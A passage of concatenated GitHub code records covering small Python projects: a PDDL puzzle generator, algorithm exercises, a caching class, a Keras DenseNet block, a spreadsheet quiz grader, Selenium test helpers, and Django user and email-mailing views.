     # raised a TypeError; go through the accessor that populates the cache instead\n        print(get_random_python_fact())\n\n\ndef get_all_misconceptions():\n    return misconceptions\n","repo_name":"andrewtatham/twitterpibot","sub_path":"twitterpibot/logic/wikipediahelper.py","file_name":"wikipediahelper.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35042698491","text":"#! 
/usr/bin/env python\r\n\r\nimport sys\r\n\r\nTASK_TEMPLATE = \"\"\";; Problem description:\r\n;; \"*\" denotes \"occupied\"\r\n;; \"o\" denotes \"free\"\r\n;;\r\n%(board_layout)s\r\n;;\r\n;; Try to move one peg to the middle of the top line\r\n;; using peg solitaire movement rules.\r\n;; The problem is unsolvable.\r\n;;\r\n(define (problem pegsolitaire-invasion-%(n)s)\r\n (:domain pegsolitaire-invasion)\r\n (:objects\r\n%(positions)s\r\n )\r\n (:init\r\n%(in_line_facts)s\r\n%(free_facts)s\r\n%(occupied_facts)s\r\n )\r\n (:goal (and\r\n%(goal_facts)s\r\n )\r\n )\r\n)\r\n\"\"\"\r\n\r\nDOMAIN = \"\"\";; Peg Solitaire invasion domain\r\n\r\n(define (domain pegsolitaire-invasion)\r\n (:requirements :typing)\r\n (:types location - object)\r\n (:predicates\r\n (IN-LINE ?x ?y ?z - location)\r\n (occupied ?l - location)\r\n (free ?l - location)\r\n )\r\n\r\n (:action jump\r\n :parameters (?from - location ?over - location ?to - location)\r\n :precondition (and\r\n (IN-LINE ?from ?over ?to)\r\n (occupied ?from)\r\n (occupied ?over)\r\n (free ?to)\r\n )\r\n :effect (and\r\n (not (occupied ?from))\r\n (not (occupied ?over))\r\n (not (free ?to))\r\n (free ?from)\r\n (free ?over)\r\n (occupied ?to)\r\n )\r\n )\r\n)\r\n\"\"\"\r\n\r\n\r\ndef generate_board_layout(n):\r\n free_line = \";;\" + \" o\" * n\r\n occupied_line = \";;\" + \" *\" * n\r\n return \"\\n\".join([free_line] * 5 + [occupied_line] * n)\r\n\r\ndef generate_positions(n):\r\n position = \" pos-%d-%d - location\"\r\n positions = [position % (x, y) for x in xrange(n) for y in xrange(n+5)]\r\n return \"\\n\".join(positions)\r\n\r\ndef generate_in_line_facts(n):\r\n fact = \" (IN-LINE pos-%d-%d pos-%d-%d pos-%d-%d)\"\r\n facts = []\r\n facts += [fact % (x, y, x, y+1, x, y+2)\r\n for x in xrange(n) for y in xrange(n+5-2)]\r\n facts += [fact % (x, y+2, x, y+1, x, y)\r\n for x in xrange(n) for y in xrange(n+5-2)]\r\n facts += [fact % (x, y, x+1, y, x+2, y)\r\n for x in xrange(n-2) for y in xrange(n+5)]\r\n facts += [fact % (x+2, y, x+1, y, x, y)\r\n for x in xrange(n-2) for y in xrange(n+5)]\r\n return \"\\n\".join(facts)\r\n\r\ndef generate_free_facts(n):\r\n fact = \" (free pos-%d-%d)\"\r\n facts = [fact % (x, y) for x in xrange(n) for y in xrange(n, n+5)]\r\n return \"\\n\".join(facts)\r\n\r\n\r\ndef generate_occupied_facts(n):\r\n fact = \" (occupied pos-%d-%d)\"\r\n facts = [fact % (x, y) for x in xrange(n) for y in xrange(n)]\r\n return \"\\n\".join(facts)\r\n\r\ndef generate_goal_facts(n):\r\n return \" (occupied pos-%d-%d)\" % (n // 2, n + 4)\r\n\r\ndef generate_task(n):\r\n board_layout = generate_board_layout(n)\r\n positions = generate_positions(n)\r\n in_line_facts = generate_in_line_facts(n)\r\n free_facts = generate_free_facts(n)\r\n occupied_facts = generate_occupied_facts(n)\r\n goal_facts = generate_goal_facts(n)\r\n return TASK_TEMPLATE % locals()\r\n\r\n\r\ndef generate_task_file(n):\r\n with open(\"prob%.02d.pddl\" % n, \"w\") as f:\r\n f.write(generate_task(n))\r\n\r\ndef generate_domain_file():\r\n with open(\"domain.pddl\", \"w\") as f:\r\n f.write(DOMAIN)\r\n\r\nif __name__ == \"__main__\":\r\n \r\n if len(sys.argv) < 2:\r\n print(\"Usage: pegsol-row5.py \")\r\n else:\r\n generate_domain_file()\r\n map(generate_task_file, map(int, sys.argv[1:]))\r\n","repo_name":"AI-Planning/unsolve-ipc-2016","sub_path":"domains/generated/pegsol-row5.py","file_name":"pegsol-row5.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
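The pegsol-row5.py record above builds every PDDL file by filling `%(name)s` placeholders with `TEMPLATE % locals()`, so each `generate_*` helper only has to bind a local variable whose name matches a placeholder. A minimal, self-contained sketch of that templating technique follows; the template text and names in it are illustrative stand-ins, not taken from the record, and it uses Python 3 `range` where the record uses Python 2 `xrange`:

```python
# Sketch of the "%(name)s" + "% locals()" templating used in pegsol-row5.py.
# TEMPLATE, generate_positions and generate_task here are hypothetical stand-ins.
TEMPLATE = """(define (problem demo-%(n)s)
  (:objects
%(positions)s
  )
)"""

def generate_positions(n):
    # one "pos-x-y - location" line per cell, mirroring the record's style
    return "\n".join("    pos-%d-%d - location" % (x, y)
                     for x in range(n) for y in range(n))

def generate_task(n):
    positions = generate_positions(n)  # the local name must match %(positions)s
    return TEMPLATE % locals()         # fills %(n)s and %(positions)s from locals

if __name__ == "__main__":
    print(generate_task(2))
```

`% locals()` keeps the call sites short at the price of an implicit coupling between placeholder names and local variable names; `TEMPLATE.format(**kwargs)` or an f-string would make that coupling explicit.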
+{"seq_id":"42601501573","text":"\"\"\"\nhttps://leetcode.com/problems/triangle/\nRuntime: 60 ms, faster than 60.70% of Python3 online submissions for Triangle.\nMemory Usage: 13.8 MB, less than 20.00% of Python3 online submissions for Triangle.\n\"\"\"\n\n\nclass Solution:\n def minimumTotal(self, triangle: List[List[int]]) -> int:\n dp = []\n for i in range(len(triangle)):\n temp = []\n for j in range(len(triangle[i])):\n if i == 0 and j == 0:\n temp.append(triangle[i][j])\n elif j == 0:\n temp.append(triangle[i][j] + dp[-1][j])\n elif j == len(triangle[i]) - 1:\n temp.append(triangle[i][j] + dp[-1][j - 1])\n else:\n temp.append(min(triangle[i][j] + dp[-1][j - 1], triangle[i][j] + dp[-1][j]))\n dp.append(temp)\n return min(dp[-1])","repo_name":"google-gazzza/algorithm","sub_path":"leetcode/medium/120_triangle/hsh2438.py","file_name":"hsh2438.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"70245652945","text":"#!/usr/bin/python3\n\"\"\"\n Contains class BasicCache\n\"\"\"\nfrom base_caching import BaseCaching\n\n\nclass MRUCache(BaseCaching):\n \"\"\"\n Caching using MRU algorithm\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize instance variables\n \"\"\"\n super().__init__()\n self.MRU = None\n\n def put(self, key, item):\n \"\"\"\n Adds a new item\n to the cache\n using MRU algorithm\n \"\"\"\n if key is not None and item is not None:\n if key not in self.cache_data.keys() and len(\n self.cache_data) >= MRUCache.MAX_ITEMS:\n print(\"DISCARD: {}\".format(self.MRU))\n del self.cache_data[self.MRU]\n\n self.cache_data[key] = item\n self.MRU = key\n\n def get(self, key):\n \"\"\"\n Gets an item\n stored in the cache\n \"\"\"\n if key in self.cache_data.keys():\n self.MRU = key\n return self.cache_data.get(key)\n","repo_name":"DudeGFA/alx-backend","sub_path":"0x01-caching/4-mru_cache.py","file_name":"4-mru_cache.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4252156871","text":"\n\ndef python_cos(q_vec, b_vec):\n \"\"\"\n 计算余弦相似度\n :param q_vec: 一维数组\n :param b_vec: 一维数组\n :return:\n \"\"\"\n dot_q_b = 0\n q_vec_length = 0\n b_vec_length = 0\n for q, b in zip(q_vec, b_vec):\n dot_q_b += q * b\n q_vec_length += q * q\n b_vec_length += b * b\n length = (q_vec_length ** (1 / 2)) * (b_vec_length ** (1 / 2))\n cos_sim = dot_q_b / length # 向量的内积除以向量模长的积\n # print('cos_sim', cos_sim)\n return cos_sim\n\n","repo_name":"1214Yuki/PosterGenerate","sub_path":"match/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34490236975","text":"import cv2\nimport numpy as np\nimport sys\nfrom os import path\nfrom . 
import Config as CFG\nfrom .ImageProcess import ImagePreprocessor\nfrom .Extractor import Extractor\nfrom .OCR import DigitOCR\n\n\nclass MeterOCR:\n def __init__(self, image, folder='.', debug=False):\n self.folder=folder\n self.imgName=image\n self.filename=path.join(self.folder, self.imgName)\n self.debug=debug\n\n def loadImage(self, fileName):\n img=cv2.imread(fileName)\n if img is None:\n exit(\"Invalid image\")\n if self.debug:\n print(\"Image shape: {}\".format(img.shape))\n return img\n\n def process(self):\n self.image = self.loadImage(self.filename)\n preprocess = ImagePreprocessor(self.image, self.folder, debug=True)\n extractor = Extractor(preprocess.image, self.folder, debug=True)\n extractor.process()\n ocr = DigitOCR()\n ocr.train()\n res = ocr.identify(extractor.digits)\n return res\n\nif __name__==\"__main__\":\n mocr = MeterOCR(sys.argv[1])\n res = mocr.process()\n print(res)\n","repo_name":"gturta/meter-ocr","sub_path":"server/lib/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2985209838","text":"#!/usr/bin/env python3\n\n\"\"\"Useless comment\"\"\"\nimport tensorflow.keras as K\n\n\ndef dense_block(X, nb_filters, growth_rate, layers):\n \"\"\"\n Create the dense block of the DenseNet-b\n :param X: The output of the previous layer\n :param nb_filters: The number of filter from the previous\n :param growth_rate: The growth rate\n :param layers: The number of layer in the dense block\n :return: The dense block module\n \"\"\"\n init = K.initializers.he_normal()\n input_data = X\n for _ in range(layers):\n norm = K.layers.BatchNormalization()(input_data)\n act = K.layers.ReLU()(norm)\n conv_1x1 = K.layers.Conv2D(filters=4 * growth_rate,\n kernel_size=(1, 1),\n kernel_initializer=init)(act)\n norm = K.layers.BatchNormalization()(conv_1x1)\n act = K.layers.ReLU()(norm)\n conv_3x3 = K.layers.Conv2D(filters=growth_rate,\n kernel_size=(3, 3),\n strides=(1, 1),\n padding=\"same\",\n kernel_initializer=init)(act)\n input_data = K.layers.Concatenate()([input_data, conv_3x3])\n\n return input_data, (growth_rate * layers) + nb_filters\n","repo_name":"Camaltra/holbertonschool-machine_learning","sub_path":"supervised_learning/deep_cnns/5-dense_block.py","file_name":"5-dense_block.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73029210385","text":"import openpyxl\nfrom Tkinter import *\nimport string\n\ndef onsubmit(event):\n mark_register ={}\n filename = txtbox_filename.get()\n filevalidateflag = validatefilename(filename)\n if (filevalidateflag):\n wb = openpyxl.load_workbook(filename)\n master_key = []\n stringbuffer = \"\"\n mark = 0\n noofquestions = txtbox_noofquestions.get()\n numbervalidateflag = validatenumber(noofquestions)\n if (not(numbervalidateflag)):\n noofquestions = 0\n else:\n noofquestions = int(noofquestions)\n sheets = wb.sheetnames\n if (\"answerkey\" in sheets):\n keysheet = wb[\"answerkey\"]\n for i in range(1,noofquestions+1):\n stringbuffer = stringbuffer + str(keysheet[\"A\" + str(i)].value)\n stringbuffer = stringbuffer + str(keysheet[\"B\" + str(i)].value)\n stringbuffer = stringbuffer + str(keysheet[\"C\" + str(i)].value)\n stringbuffer = stringbuffer + str(keysheet[\"D\" + str(i)].value)\n master_key.append(stringbuffer)\n stringbuffer = \"\"\n \n\n for sheet in sheets:\n #print (sheet)\n if ((sheet != 
\"answerkey\") and (sheet != \"result\")):\n answersheet = wb[sheet]\n for i in range(1,noofquestions+1):\n stringbuffer = stringbuffer + str(answersheet[\"A\" + str(i)].value)\n stringbuffer = stringbuffer + str(answersheet[\"B\" + str(i)].value)\n stringbuffer = stringbuffer + str(answersheet[\"C\" + str(i)].value)\n stringbuffer = stringbuffer + str(answersheet[\"D\" + str(i)].value)\n if (stringbuffer == master_key[i-1]):\n mark = mark + 1\n stringbuffer = \"\"\n answersheet[\"F1\"].value = \"Total :\"\n answersheet[\"G1\"].value = mark\n #print (str(sheet)+ \":\" +str(mark))\n mark_register[sheet]=mark\n wb.save(filename)\n mark = 0\n\n if (\"result\" in sheets):\n print (\"result sheet is already available\")\n print (\"updating..........\")\n del wb[\"result\"]\n wb.create_sheet(\"result\")\n resultsheet = wb[\"result\"]\n index = 1\n for sheet in sheets:\n if ((sheet != \"answerkey\") and (sheet != \"result\")):\n resultsheet[\"A\" + str(index)].value = sheet\n resultsheet[\"B\" + str(index)].value = mark_register[sheet]\n index = index + 1\n \n wb.save(filename)\n print (\"done\")\ndef validatefilename(filename):\n if(filename != \"\"):\n if (type(filename)== str):\n if (\".xlsx\" in filename):\n return True\n else:\n print (\"extension is invalid\")\n return False\n else:\n print (\"filename should be string\")\n return False\n else:\n print (\"text box is empty\")\n return False\n \n \ndef validatenumber(number):\n checklist = list(string.ascii_lowercase)\n checklist+list(string.ascii_uppercase)\n checklist+list(string.punctuation)\n if(number != \"\"):\n flag = True\n for letter in checklist:\n if(letter in number):\n flag = False\n if (flag):\n flag = False\n for letter in range(10):\n if(str(letter) in number):\n flag = True\n if (flag):\n return True\n else:\n print (\"there is no number\")\n return False\n else:\n print (\"there should not any special character or alphabet\")\n return False\n else:\n print(\"text box is empty\")\n return False\n \nwindow = Tk()\nLabel(window , text=\"file name with extension\").grid(row=0 , sticky=W)\ntxtbox_filename = Entry(window, width=20)\ntxtbox_filename.grid(row=0,column=1, sticky=E)\nLabel(window , text=\"number of question\").grid(row=1 , sticky=W)\ntxtbox_noofquestions = Entry(window, width=20)\ntxtbox_noofquestions.grid(row=1,column=1, sticky=E)\nbutton = Button(window , text=\"submit\")\nbutton.grid(row=2,column=1, sticky=E)\nbutton.bind(\"\" , onsubmit)\nwindow.mainloop()\n \n \n","repo_name":"baarath9829/MCQ_Correcter","sub_path":"MCQ.py","file_name":"MCQ.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1701098065","text":"#Дані про температуру повітря за декаду листопада зберігаються в масиві.\n#Визначити, скільки разів температура опускалася нижче -10 градусів.\n#Павлюк Владислав\nimport numpy as np#импортируем библиотеку нампи\nimport random\nwhile True:\n b=np.zeros(10,dtype=int)#инициализируем масив нулями ,и присваиваем типу данных тип данных инт\n for i in range(10):#проходимся по елементам масива\n b[i] = random.randint(-20,10)\n print(b)\n count=0\n for k in range(10):#снова проходимся по нашей матрице\n if b[k]<-10: #если елементы меньше -10,счетчик +1\n count+=1\n if count==2 or count==3 or count==4:\n print('Опускалась',count,'раза')\n else:\n print('Опускалась',count,'раз')\n result = input('Хотите продолжить? 
1 = yes, anything else = no: ')\n    if result == '1':\n        continue\n    else:\n        break\n","repo_name":"Vladislav1223/Colocvium","sub_path":"10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17574822955","text":"# -- coding: utf-8 --\nimport time\nimport datetime\nimport unittest\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom buttons import *\nimport pyautogui\nfrom change_status import *\nimport json\nimport requests\nfrom selenium.webdriver.common.keys import Keys\n\nclass Bets_constructor(object):\n    # Bids for the bargaining stage (don't forget to wait after the page loads!)\n\n    # Fill in the price field in rubles (first bid)\n    def price_bet1(self, driver):\n        Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n        Price.send_keys(\"2500\")\n\n    # Fill in the price field in rubles (second bid)\n    def price_bet2(self, driver):\n        Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n        Price.send_keys(\"2000\")\n\n    # Fill in the price field in rubles (first bid, rebidding round)\n    def price_bet1_resell(self, driver):\n        Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n        Price.send_keys(\"1500\")\n\n    # Fill in the price field in rubles (second bid, rebidding round)\n    def price_bet2_resell(self, driver):\n        Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n        Price.send_keys(\"1000\")\n\n    # Fill in the price field as a percentage (first bid)\n    def price_bet1_persent(self, driver):\n        Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n        Price.send_keys(u'\\ue009' + u'\\ue003')\n        Price.send_keys(\"10\")\n\n    # Fill in the price field as a percentage (second bid)\n    def price_bet2_persent(self, driver):\n        Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n        Price.send_keys(u'\\ue009' + u'\\ue003')\n        Price.send_keys(\"20\")\n\n    # Fill in the price field as a percentage (first bid, rebidding round)\n    def price_bet1_persent_resell(self, driver):\n        Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n        Price.send_keys(u'\\ue009' + u'\\ue003')\n        Price.send_keys(\"25\")\n\n    # Fill in the price field as a percentage (second bid, rebidding round)\n    def price_bet2_persent_resell(self, driver):\n        Price = driver.find_element(By.CSS_SELECTOR, 'input#price')\n        Price.send_keys(u'\\ue009' + u'\\ue003')\n        Price.send_keys(\"30\")\n\n    # Fill in the comment field (note: the leading 'с' of this method name is Cyrillic in the original)\n    def сomment_bet(self, driver):\n        time.sleep(5)\n        Comment = driver.find_element(By.CSS_SELECTOR, '[id=comment][name=comment]')\n        Comment.send_keys(\"Autotest\")\n\n    # Attach a file to the bid\n    def add_file_bet(self, driver):\n        time.sleep(2)\n        pyautogui.write(r'C:\\Users\\Saya\\Desktop\\form.xlsx')\n        time.sleep(1)\n        pyautogui.press('enter')\n\n    # Confirmation modal window for the first bid\n    def modal_window_first_bet(self, driver):\n        driver.find_element(By.CSS_SELECTOR, 'div#root span.ant-checkbox > input').click()\n        SMS_code = driver.find_element(By.CSS_SELECTOR, 'input#sms_code')\n        SMS_code.send_keys(\"9999\")\n        driver.find_element(By.CSS_SELECTOR, 'div#root div.reveal_form > button[type=\"button\"]').click()\n\n    # Confirmation modal window for the second bid\n    def modal_window_second_bet(self, driver):\n        SMS_code = driver.find_element(By.CSS_SELECTOR, 'input#sms_code')\n        SMS_code.send_keys(\"9999\")\n        driver.find_element(By.CSS_SELECTOR, 'div#root div.reveal_form > 
button[type=\"button\"]').click()\n\n","repo_name":"Luda-Glazova/Autotests","sub_path":"bets_constructor.py","file_name":"bets_constructor.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7813590298","text":"from django.http.response import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib import messages\nfrom django.contrib.auth.forms import UserCreationForm\nfrom users.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom api import views as api\nfrom api import urls as calls\nfrom api import serializers as ser\nfrom home.views import home_redirect\nfrom .forms import UserRegisterForm\nimport json\n\n\ndef register(request):\n register_form = UserRegisterForm()\n if request.method == 'POST':\n response = api.create_users(request)\n if response.status_code != 400:\n messages.success(request, f'Account created for {response.data[\"username\"]}')\n return redirect(\"/login\")\n else:\n error_message = \"\"\n for val in response.data:\n error_message += val\n return render(request, 'users/register.html', {'register_form': register_form, 'error_message': error_message})\n return render(request, 'users/register.html', {'register_form': register_form})\n\ndef login(request):\n login_form = AuthenticationForm()\n if request.method == 'POST':\n response = api.login(request)\n if response.status_code != 400:\n request.session['user_id'] = response.data['id']\n messages.success(request, f'Welcome back {response.data[\"username\"]}!')\n return redirect(\"/items\")\n else:\n error_message = \"\"\n for val in response.data:\n error_message += val\n return render(request, 'users/login.html', {'login_form': login_form, 'error_message': error_message}) \n return render(request, 'users/login.html', {'login_form': login_form})\n\n@login_required\ndef update(request):\n if request.method == 'POST':\n update_form = UserUpdateForm(request.POST, instance=request.user)\n\n if update_form.is_valid:\n update_form.save()\n messages.info(request, f'Your account has been updated!')\n return redirect('update')\n else:\n update_form = UserUpdateForm(instance=request.user)\n\n context = {\n 'update_form': update_form\n }\n \n return render(request, 'users/update.html', context)\n\ndef account(request):\n if 'user_id' not in request.session:\n return redirect (\"/login\")\n user_id = request.session['user_id']\n \n if request.method==\"POST\":\n if 'delete_acc' in request.POST:\n request.method = 'DELETE'\n request.META['REQUEST_METHOD'] = 'DELETE'\n\n #call api to delete user where user.id == user_id\n response = api.delete_user(request, user_id)\n if response.status_code != 400:\n del request.session['user_id'] # delete session\n messages.success(request, f'Account Deleted, see you space cowboy')\n return redirect('/')\n else:\n messages.error(request, f'Account couldn\\'t be deleted, better luck next time!')\n return redirect('/')\n if 'log_out' in request.POST:\n \n del request.session['user_id'] #deleting session\n messages.success(request, f'You have been logged out')\n return redirect('/')\n else:\n response = api.view_user(request, user_id)\n return render(request, 'users/accountDetails.html', 
response.data)","repo_name":"cookiewho/CST438_Project2_GroupE","sub_path":"wishlist/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11811772332","text":"import os\nfrom smtplib import SMTPException\nfrom django.core.mail import send_mail\nfrom django.core.paginator import Paginator\nfrom django.utils import timezone\nfrom django.contrib.auth import logout, login\nfrom django.contrib.auth.models import Permission\nfrom django.contrib.auth.views import LoginView, PasswordChangeView\nfrom django.shortcuts import redirect, render\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.views import View\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView, FormView, TemplateView\nfrom config import settings\nfrom sender.forms import *\nfrom django.http import HttpResponseRedirect\nfrom sender.models import*\nfrom sender.utils import custom_send_mail, translit\nfrom django.contrib.auth.tokens import default_token_generator as token_gen\nfrom sender.utils.cache import cache_home_posts, cache_blog\n\nweekdays_cron_dict = {\n 'понедельник': '1', 'вторник': '2', 'среда': '3', 'четверг': '4',\n 'пятница': '5', 'суббота': '6', 'воскресенье': '0'\n}\n\n\ndef include_static_context():\n context = {}\n context['status_mailing_done'] = ConfigMailing.STATUS_DONE\n context['status_mailing_started'] = ConfigMailing.STATUS_STARTED\n context['status_mailing_moderating'] = ConfigMailing.STATUS_MODERATING\n context['period_mailing_month'] = ConfigMailing.PERIOD_MONTH\n context['period_mailing_week'] = ConfigMailing.PERIOD_WEEK\n context['status_letter_sent'] = LetterMailing.STATUS_SENT\n context['status_letter_wait'] = LetterMailing.STATUS_WAIT\n context['periods'] = ConfigMailing.PERIODS_TUPLE\n context['hours'] = [x for x in range(0, 24)]\n context['minutes'] = [x for x in range(0, 60)]\n context['ban_mailing_true'] = ConfigMailing.BANNED_TRUE\n context['ban_mailing_false'] = ConfigMailing.BANNED_FALSE\n context['ban_user_true'] = User.BANNED_TRUE\n context['ban_user_false'] = User.BANNED_FALSE\n\n return context\n\ndef redirect_to_main_page(user):\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return reverse_lazy('sender:moderating_mailings')\n\n if user.has_perm('sender.view_and_ban_any_user'):\n return reverse_lazy('sender:moderating_users')\n\n if user.has_perm('sender.content_management'):\n return reverse_lazy('sender:content_management_posts')\n\n return reverse_lazy('sender:profile')\n\n\nclass ConfigMailingDetailView(DetailView):\n '''\n Экземпляр данного класса служит прокси-объектом для передачи динамического и статического\n контекста нескольким другим контроллерам, также основанным на модели ConfigMailing\n '''\n model = ConfigMailing\n template_name = 'sender/mailing_detail_user.html'\n\n def include_user_and_static_context(self, obj, user):\n context = {}\n context['trials'] = TryMailing.objects.all().filter(user=user, mailing=obj)\n context['letters'] = LetterMailing.objects.all().filter(user=user, mailing=obj).order_by('position')\n context['sent_letters_count'] = LetterMailing.objects.all().filter(user=user, mailing=obj, status=LetterMailing.STATUS_SENT).count()\n context.update(include_static_context())\n\n return context\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(self.include_user_and_static_context(self.get_object(), 
self.request.user))\n\n return context\n'''proxy object'''\nproxy_mailing_detail = ConfigMailingDetailView()\n\n\nclass RegisterUser(CreateView):\n form_class = RegisterUserForm\n template_name = 'sender/forms/registration.html'\n s = 'sender'\n get_perm = Permission.objects.get_by_natural_key\n\n user_permissions = [\n {'app': s, 'act': 'add_configmailing', 'mod': 'configmailing'}, {'app': s, 'act': 'change_configmailing', 'mod': 'configmailing'},\n {'app': s, 'act': 'view_configmailing', 'mod': 'configmailing'}, {'app': s, 'act': 'delete_configmailing', 'mod': 'configmailing'},\n {'app': s, 'act': 'add_lettermailing', 'mod': 'lettermailing'}, {'app': s, 'act': 'change_lettermailing', 'mod': 'lettermailing'},\n {'app': s, 'act': 'delete_lettermailing', 'mod': 'lettermailing'}, {'app': s, 'act': 'view_lettermailing', 'mod': 'lettermailing'},\n ]\n def get(self, request, *args, **kwargs):\n super().get(request, *args, **kwargs)\n\n if self.request.user.is_authenticated:\n return HttpResponseRedirect(redirect_to_main_page(self.request.user))\n\n return self.render_to_response(self.get_context_data())\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n\n if form.is_valid():\n form.save()\n email = form.cleaned_data.get('email')\n password = form.cleaned_data.get('password1')\n user = authenticate(email=email, password=password)\n\n try:\n custom_send_mail.verify(request, user)\n\n for perm in self.user_permissions:\n user.user_permissions.add(self.get_perm(codename=perm['act'], app_label=perm['app'], model=perm['mod']).pk)\n\n except SMTPException as e:\n os.system(f'echo {timezone.now()}, {e} >> register_errors.txt')\n\n return redirect('sender:some_error')\n\n else:\n return redirect('sender:confirm_email')\n\n context = {'form': form}\n\n return render(request, self.template_name, context)\n\n\nclass ConfirmEmailTemplateView(TemplateView):\n template_name = 'sender/service/confirm_email.html'\n\n def get(self, request, *args, **kwargs):\n context = super().get_context_data(**kwargs)\n\n if self.request.user.is_authenticated:\n return HttpResponseRedirect(redirect_to_main_page(self.request.user))\n\n return self.render_to_response(context)\n\n\nclass EmailVerifyView(View):\n\n def get(self, request, uidb64, token):\n user = self.get_user(uidb64)\n\n if user is not None and token_gen.check_token(user, token):\n user.email_verify = True\n user.save()\n login(request, user)\n\n return redirect('sender:profile')\n\n return redirect('sender:invalid_verify')\n\n @staticmethod\n def get_user(uidb64):\n try:\n uid = urlsafe_base64_decode(uidb64).decode()\n user = User.objects.get(pk=uid)\n\n except (TypeError, ValueError, OverflowError, User.DoesNotExist, ValidationError):\n user = None\n\n return user\n\n\nclass LoginUser(LoginView):\n form_class = CustomAuthenticationForm\n template_name = 'sender/forms/login.html'\n\n def get_success_url(self):\n return redirect_to_main_page(self.request.user)\n\n def get(self, request, *args, **kwargs):\n super().get(request, *args, **kwargs)\n\n user = self.request.user\n\n if user.is_authenticated:\n return HttpResponseRedirect(redirect_to_main_page(self.request.user))\n\n return self.render_to_response(self.get_context_data())\n\n\ndef logout_user(request):\n logout(request)\n return redirect('sender:login')\n\n\nclass ListAndCreateConfigMailing(CreateView):\n model = ConfigMailing\n fields = ('title', 'hour', 'minute', 'periodicity', 'mail_dump')\n template_name = 'sender/mailing_list_user.html'\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get(request, *args, **kwargs)\n\n if user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n if user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n user = self.request.user\n self.object.user = user\n self.object.save()\n\n if self.object.periodicity == self.model.PERIOD_DAY:\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {self.object.pk} >> log_cronjobs.txt'''\n start = 'crontab -l | { cat; echo '\n time = f'''\"{self.object.minute} {self.object.hour} * * * '''\n cmd = f'{cmd}\"; '\n end = '} | crontab -'\n os_cmd = start + time + cmd + end\n os.system(os_cmd)\n\n return super().form_valid(form)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"object_list\"] = self.model.objects.all().filter(user=self.request.user.pk).order_by('-create_at')\n context['user'] = self.request.user\n context.update(include_static_context())\n\n return context\n\n\nclass ConfigMailingCreateViewMobile(CreateView):\n '''Handles mailing creation from smartphones and tablets'''\n model = ConfigMailing\n template_name = 'sender/mailing_create_for_mobile.html'\n fields = ('title', 'from_email', 'hour', 'minute', 'periodicity', 'mail_dump')\n success_url = reverse_lazy('sender:profile')\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n\n if not user.is_authenticated:\n return redirect('sender:login')\n\n if user.has_perm('sender.view_and_ban_any_mailing'):\n return super().get(request, *args, **kwargs)\n\n if user.has_perm('sender.view_and_ban_any_user'):\n return redirect('sender:access_error')\n\n if user.has_perm('sender.content_management'):\n return redirect('sender:access_error')\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(include_static_context())\n\n return context\n\n def form_valid(self, form):\n self.object = form.save()\n user = self.request.user\n self.object.user = user\n self.object.save()\n path_project = '/'.join(os.path.abspath('manage.py').split('/')[3:-1])\n cmd = f'cd {path_project} && myvenv/bin/python3 manage.py send_by_cron -u {user.pk} -m {self.object.pk} >> log_cronjobs.txt'''\n\n if self.object.periodicity == self.model.PERIOD_DAY:\n start = 'crontab -l | { cat; echo '\n time = f'''\"{self.object.minute} 